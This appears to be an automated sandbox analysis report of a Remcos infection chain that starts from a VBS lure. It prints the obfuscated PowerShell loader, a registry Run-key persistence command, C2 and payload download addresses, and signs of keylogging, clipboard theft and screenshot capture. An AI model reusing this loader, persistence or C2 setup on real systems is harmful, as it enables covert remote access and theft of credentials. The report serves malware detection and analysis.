              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2404, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Naergaaende
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4240, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)", ProcessId: 2404, ProcessName: reg.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1848, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)", ProcessId: 4240, ProcessName: cmd.exe
              Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2404, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Naergaaende
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs", ProcessId: 6172, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDividetU,dsig.,dningWM kroseSfogatbInfiksCpi.kanlRena l

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 1848, TargetFilename: C:\ProgramData\remcos\logs.dat
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: Yara matchFile source: 00000013.00000003.1861984710.000000002511C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Binary string: m.Core.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.0000000008866000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 4e089\System.Core.pdb-)9 source: powershell.exe, 0000000F.00000002.1857571369.00000000088DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbG source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0040AE51 FindFirstFileW,FindNextFileW,26_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,27_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,28_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WCN\en-GB\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\Jump to behavior

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficTCP traffic: 192.168.2.7:49711 -> 146.70.57.34:2286
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewIP Address: 146.70.57.34 146.70.57.34
              Source: global trafficHTTP traffic detected: GET /Fodgngerovergangs.prm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /JTcKQkcYvvHPBH210.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: global trafficHTTP traffic detected: GET /Fodgngerovergangs.prm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /JTcKQkcYvvHPBH210.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 0000001A.00000003.1934746117.0000000003439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginSP equals www.facebook.com (Facebook)
              Source: wab.exe, 0000001A.00000003.1934746117.0000000003439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginSP equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: paygateme.net
              Source: powershell.exe, 0000000B.00000002.2085378720.000001C45C038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2085378720.000001C45D6CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.184
              Source: powershell.exe, 0000000B.00000002.2085378720.000001C45C038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.184/Fodgngerovergangs.prmP
              Source: powershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.184/Fodgngerovergangs.prmXR
              Source: powershell.exe, 0000000B.00000002.2085378720.000001C45D6CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.H
              Source: wab.exe, 00000013.00000003.1880111826.0000000008779000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.1874089529.000000000877C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: powershell.exe, 0000000B.00000002.2227118758.000001C46BE7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 0000000B.00000002.2085378720.000001C45BE11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1847892742.0000000004DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000001C.00000002.1917436309.0000000002DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 0000001C.00000002.1917436309.0000000002DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comppData
              Source: wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 0000001A.00000002.1935559415.0000000002E34000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 0000000B.00000002.2085378720.000001C45BE11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000F.00000002.1847892742.0000000004DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000B.00000002.2085378720.000001C45D044000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: wab.exe, 0000001A.00000003.1922074468.0000000004C01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000001A.00000003.1922470776.0000000004C05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 0000001A.00000003.1922074468.0000000004C01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000001A.00000003.1922470776.0000000004C05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 0000001A.00000003.1934746117.0000000003439000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000001A.00000003.1922074468.0000000004C01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000001A.00000003.1922470776.0000000004C05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 0000000B.00000002.2227118758.000001C46BE7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0041183A OpenClipboard,GetLastError,DeleteFileW,26_2_0041183A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,26_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,26_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,27_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,27_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,28_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,28_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000013.00000003.1861984710.000000002511C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201135.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181320.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201235.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181420.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201336.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181520.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201436.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201536.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201636.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181621.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201736.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181721.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201836.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181821.dat entropy: 7.99901409683Jump to dropped file
